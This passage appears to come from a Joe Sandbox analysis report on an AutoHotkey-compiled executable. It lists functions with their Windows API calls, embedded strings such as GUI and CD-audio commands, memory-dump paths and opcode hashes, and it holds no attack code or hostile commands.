SendMessageA.USER32(?,00000421,00000001,00000000), ref: 0045D5C5
SendMessageA.USER32(?,00000421,00000000,00000000), ref: 0045D5D6
SendMessageA.USER32(?,00000420,00000001,00000000), ref: 0045D5EA
SendMessageA.USER32(00000000,00000420,00000000,00000000), ref: 0045D607
GetWindowRect.USER32(?,?), ref: 0045D682

Strings

ahk_autosize, xrefs: 0045D635, 0045D651, 0045D662

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$RectWindow
String ID: ahk_autosize
API String ID: 1944065686-1503521729
Opcode ID: eb0d57b426bae8af77b07a2374fa58ea55016c8c9a996749d8dca4da52980a01
Instruction ID: 73bbefd34531e93d6d10f9007f33100c2d0cfd9af6f730d7e7c17235ffb6f9cb
Opcode Fuzzy Hash: eb0d57b426bae8af77b07a2374fa58ea55016c8c9a996749d8dca4da52980a01
Instruction Fuzzy Hash: E441B775A40304BBEB309BA4CC46F6B73A9EF84B01F44851EFE459B282D6B8ED05C759

Function 0046A1B0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 117COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 0046A23D

Strings

Ctrl, xrefs: 0046A237
Shift, xrefs: 0046A26B
Alt, xrefs: 0046A251

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __fassign
String ID: Alt$Ctrl$Shift
API String ID: 3965848254-3426316353
Opcode ID: 9c102ef35701a60d7f56c3c132a2032391b9523d0971b942b5a37d9f42c5540c
Instruction ID: 5e2d9324acfd6ffd45a546856f8ac28c622d4b478d5c5c821a9552bbd87b3e2d
Opcode Fuzzy Hash: 9c102ef35701a60d7f56c3c132a2032391b9523d0971b942b5a37d9f42c5540c
Instruction Fuzzy Hash: 3331A921188BC41ADB309A244C25BEB7BC56B53304F5804DFE8C063382F39E4DAD97AB

Function 004515AD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116windowCOMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 00451622
CreateFontA.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004516DF
SendMessageA.USER32(00000000,00000030,?,00000001), ref: 004516F0

Strings

Segoe UI, xrefs: 00451610, 00451656
static, xrefs: 004515E1
DISPLAY, xrefs: 004515FC

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateFontMessageSend_strncpy
String ID: DISPLAY$Segoe UI$static
API String ID: 830186405-3328339553
Opcode ID: 8c7fc90083f49506437ee36bf193243c9c29076e9bbf2722a6901e9389c25379
Instruction ID: f9e043e42217645b3d6fba9dd4d6e832dd2f36540ca87f18817807925af487f3
Opcode Fuzzy Hash: 8c7fc90083f49506437ee36bf193243c9c29076e9bbf2722a6901e9389c25379
Instruction Fuzzy Hash: F331B3712883407FF220DB648C47F6B7BACABD9B00F14451DFB45AA2D2D6F4A805872A

Function 00468A30 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 114windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00000406,?,?), ref: 00468AE1
SendMessageA.USER32(?,00000409,00000000,FF000000), ref: 00468AFA
SendMessageA.USER32(?,00002001,00000000,?), ref: 00468B17
SendMessageA.USER32(?,00002001,00000000,?), ref: 00468B47

Strings

SetWindowTheme, xrefs: 00468A6B
uxtheme, xrefs: 00468A5A

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID: SetWindowTheme$uxtheme
API String ID: 3850602802-1369271589
Opcode ID: bac4d22e83089e1a7600d4ff062873e7189ffb369b8f1b2672ccaedc804b94d1
Instruction ID: c5bd023081844b8b808019a86f839f8818e7ff5a3eb352b92f7a01b49dd829df
Opcode Fuzzy Hash: bac4d22e83089e1a7600d4ff062873e7189ffb369b8f1b2672ccaedc804b94d1
Instruction Fuzzy Hash: 4731E0712407106AE63096A98C85F7BB398EF11724F24071FFA51966C1FBA8FC81876E

Function 0043F090 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 106COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 0043F20E

Strings

\, xrefs: 0043F233
closed, xrefs: 0043F10B
open %s type cdaudio alias cd wait shareable, xrefs: 0043F15A
open, xrefs: 0043F112, 0043F117
set cdaudio door %s wait, xrefs: 0043F118

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _strncpy
String ID: \$closed$open$open %s type cdaudio alias cd wait shareable$set cdaudio door %s wait
API String ID: 2961919466-1868611008
Opcode ID: a13869f86285cceb0acf4a70b1c11abb07a3d4c8063400263bd0a4a1a41cc46a
Instruction ID: 4eed02f5f8f88596ec54747990df53ca3040fdb1d73fd6b764285328599e46fc
Opcode Fuzzy Hash: a13869f86285cceb0acf4a70b1c11abb07a3d4c8063400263bd0a4a1a41cc46a
Instruction Fuzzy Hash: 99319E365043445AD730B225AC06FFB77889BD4314F48457BF988C6193D6ADA98C83AE

Function 0042A615 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101COMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 0042A623

Part of subcall function 0048828D: __mbsnbicmp_l.LIBCMT ref: 0048829D

__fassign.LIBCMT ref: 0042A706

Part of subcall function 00488EC1: __mbschr_l.LIBCMT ref: 00488ECE

_sprintf.LIBCMT ref: 0042A6E7

Part of subcall function 00414D30: __wcstoi64.LIBCMT ref: 00414D40

Strings

%%%s%s%s, xrefs: 0042A6E1
Integer, xrefs: 0042A700
Float, xrefs: 0042A61D

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __fassign$__mbschr_l__mbsnbicmp_l__wcstoi64_sprintf
String ID: %%%s%s%s$Float$Integer
API String ID: 608960318-2931010843
Opcode ID: 91cd1e3cc9b20731e0d32fea8946f356ab43e7114c9b8d34f37794b45550d3f5
Instruction ID: bbf7e07ec60842e2318e99e213844c5b563edda57ff61f58cd7b30f13b82f5ba
Opcode Fuzzy Hash: 91cd1e3cc9b20731e0d32fea8946f356ab43e7114c9b8d34f37794b45550d3f5
Instruction Fuzzy Hash: 1C3178727043609BEB14DB21AC4176B3B959B85304F99493FFA008B392E77CCC41878E

Function 0045D042 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001002,00000001,?), ref: 0045D08D

Part of subcall function 00474580: _strncpy.LIBCMT ref: 004745A3
Part of subcall function 00474580: _strncpy.LIBCMT ref: 004745CC
Part of subcall function 00474580: _strncpy.LIBCMT ref: 00474601
Part of subcall function 00474580: _strncpy.LIBCMT ref: 00474632
Part of subcall function 00474580: _strncpy.LIBCMT ref: 00474664
Part of subcall function 00474580: _strncpy.LIBCMT ref: 00474696

SendMessageA.USER32(?,00001002,00000000,?), ref: 0045D072
GetWindowLongA.USER32 ref: 0045D0A3

Strings

LongDate, xrefs: 0045D0B3
Time, xrefs: 0045D0F9

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _strncpy$MessageSend$LongWindow
String ID: LongDate$Time
API String ID: 3996020298-1184810688
Opcode ID: 794b34e6d800b83954ba1f81c1ca2b1defa86753f062b8f63f9a3276657d6af4
Instruction ID: 8a07cff5bdfc864776363b4103f1b7b6b5a341f760b768ede74ddb3107cc584d
Opcode Fuzzy Hash: 794b34e6d800b83954ba1f81c1ca2b1defa86753f062b8f63f9a3276657d6af4
Instruction Fuzzy Hash: B621E071E44204ABEB309B649C46B6A3AA4AF11726F14453AFD16972C2E2B8DC09C75A

Function 00446430 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 00446494

Strings

comctl32, xrefs: 00446465
gdi32, xrefs: 00446471
user32, xrefs: 00446452
kernel32, xrefs: 00446459
DllCall, xrefs: 00446560

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _strncpy
String ID: DllCall$comctl32$gdi32$kernel32$user32
API String ID: 2961919466-1793033601
Opcode ID: 830afa49254acfe0f92f1c5f53f0e61cb73facdba5b1dca1e7f93d9266821d2c
Instruction ID: 6e772d427aef6b7890085d42a4c1e4c9bd608eb794cc70ff817acd05f5d997a8
Opcode Fuzzy Hash: 830afa49254acfe0f92f1c5f53f0e61cb73facdba5b1dca1e7f93d9266821d2c
Instruction Fuzzy Hash: 2E115B71A4434567D720FBB5AC49F8B7FD8AFA5704F45043EF44482152EB7C88088B6A

Function 004160B0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 50COMMON

Download Yara Rule

Strings

ThenEvent, xrefs: 004160FB
Input, xrefs: 004160E2
ThenPlay, xrefs: 0041610D
Play, xrefs: 004160B3
Event, xrefs: 004160CC

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Event$Input$Play$ThenEvent$ThenPlay
API String ID: 0-2317936873
Opcode ID: 5fbe0dc34fa14b504d913560db03bdfd86bbae7109a1788ceabcfd537f2044c5
Instruction ID: 5306ccbd3aab2495005f9dad2efcc2cb8017e292d2cfd97f4027a93773cd8cf4
Opcode Fuzzy Hash: 5fbe0dc34fa14b504d913560db03bdfd86bbae7109a1788ceabcfd537f2044c5
Instruction Fuzzy Hash: 15F04F62A0563122ED30B52A7D02BDB1E884B21396F2A44BBFC0495287F64DCD8541EE

Function 00416CCD Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 00416CE2
DeleteObject.GDI32(?), ref: 00416CEC
DeleteObject.GDI32(?), ref: 00416CF6
DeleteObject.GDI32(?), ref: 00416D1D

Strings

@J, xrefs: 00416CFB
HJ, xrefs: 00416D0A

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: DeleteObject
String ID: @J$HJ
API String ID: 1531683806-850517090
Opcode ID: f9f302360187b25f70383caa9a2eaa2b3deb70439e10151b66290593ef4a4c22
Instruction ID: 6e7f8053bb69444922715c8455469a024f6252cf38ac5639112bb929ef973409
Opcode Fuzzy Hash: f9f302360187b25f70383caa9a2eaa2b3deb70439e10151b66290593ef4a4c22
Instruction Fuzzy Hash: 3C01CD7470021A57EB309A7A9D85BABB7ECAF1474074A486EA885D3340EF2CEC80D57C

Function 00497213 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00497234

Part of subcall function 0048BF42: __amsg_exit.LIBCMT ref: 0048BF52

__getptd.LIBCMT ref: 00497245
__getptd.LIBCMT ref: 00497253

Strings

MOC, xrefs: 00497226
RCC, xrefs: 0049721F
csm, xrefs: 0049722D

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __getptd$__amsg_exit
String ID: MOC$RCC$csm
API String ID: 1969926928-2671469338
Opcode ID: a3e5e8ec2f3367fa392418febbfbdfb792966108c64e2143d2f1b2a26aec62e7
Instruction ID: 76f7545632211d1b808637b9415f134dfbaa6931640ea0f187e207e686935c0a
Opcode Fuzzy Hash: a3e5e8ec2f3367fa392418febbfbdfb792966108c64e2143d2f1b2a26aec62e7
Instruction Fuzzy Hash: 30E0ED315341048ECB10A779844A76D3BA5EB89318F5958F7A61CCB222C72C9850AB9B

Function 004C9580 Relevance: 9.3, APIs: 6, Instructions: 259COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000100,?,?,?,?,?,?,?,?), ref: 004C9650
_malloc.LIBCMT ref: 004C9689
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,?,00000000,?,?,?,?,?), ref: 004C96BC
_malloc.LIBCMT ref: 004C974B
__freea.LIBCMT ref: 004C97AC

Memory Dump Source

Source File: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ByteCharMultiWide_malloc$__freea
String ID:
API String ID: 2523979095-0
Opcode ID: 02c25684acd8156ddf155e5af68c80a7e5aabffc576ad819eabb11b9472026ce
Instruction ID: f05ff4c984d830db47232af3ee15413504ccffb6e80ce068b8799b2b98c3982a
Opcode Fuzzy Hash: 02c25684acd8156ddf155e5af68c80a7e5aabffc576ad819eabb11b9472026ce
Instruction Fuzzy Hash: 0881BB7A912109FFCF51AF65CC89EAF3BA5FB48314B10452FF905A2260C7398D61DB68

Function 0040164D Relevance: 9.2, APIs: 6, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: LongParentWindow
String ID:
API String ID: 3996284917-0
Opcode ID: 8c951a2c0e08fe4125cb802e8e4d197e08059fe7fddcbb1182ee3415c82672d3
Instruction ID: f49583ae015499afbbd92fbdd4e905eb053bc349c86e756b2519f3a62159e4e3
Opcode Fuzzy Hash: 8c951a2c0e08fe4125cb802e8e4d197e08059fe7fddcbb1182ee3415c82672d3
Instruction Fuzzy Hash: 0D81AE30705341ABDB209B688884B6F76A56B85714F584A3BF491BB3F1D77CEC81CB4A

Function 004CE96E Relevance: 9.1, APIs: 6, Instructions: 132COMMONLIBRARYCODE

Download Yara Rule

APIs

_strlen.LIBCMT ref: 004CE9F0
MultiByteToWideChar.KERNEL32(?,00000001,?,004CCEF0,00000000,00000000,?,004CCEF0,00000001,00000000,?,?,?,?,?,?), ref: 004CEA30
_malloc.LIBCMT ref: 004CEA40
_memset.LIBCMT ref: 004CEA68
MultiByteToWideChar.KERNEL32(?,00000001,?,004CCEF0,00000000,00000000,?,?,?,?,?,?,?,004CCEF0,00000001,00000000), ref: 004CEA7F

Memory Dump Source

Source File: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ByteCharMultiWide$_malloc_memset_strlen
String ID:
API String ID: 4088468251-0
Opcode ID: 8e5ce368268667c89838a31930162ae4dac0a12b850579eee289f256d78b3061
Instruction ID: 7f4d3b07ec803585cb08dedc289b11cfd1eb0a237dd160e0dfb1d8bb34e45b3b
Opcode Fuzzy Hash: 8e5ce368268667c89838a31930162ae4dac0a12b850579eee289f256d78b3061
Instruction Fuzzy Hash: E8416B75D00209AFCF51DF9ACC81EEFBBB9FB48310F10452AE914A2250D73A9D41DBA8

Function 0045E244 Relevance: 9.1, APIs: 6, Instructions: 120COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 0045E29F
DeleteObject.GDI32(?), ref: 0045E2B3
DestroyCursor.USER32(?), ref: 0045E2FB
DestroyCursor.USER32(?), ref: 0045E37A
DestroyCursor.USER32(?), ref: 0045E381
DestroyAcceleratorTable.USER32(?), ref: 0045E38B

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Destroy$Cursor$DeleteObject$AcceleratorTable
String ID:
API String ID: 4010243055-0
Opcode ID: 888c83df3d2a141162ac5636a7eb7185342563c220d4bec53a2df05ae937859a
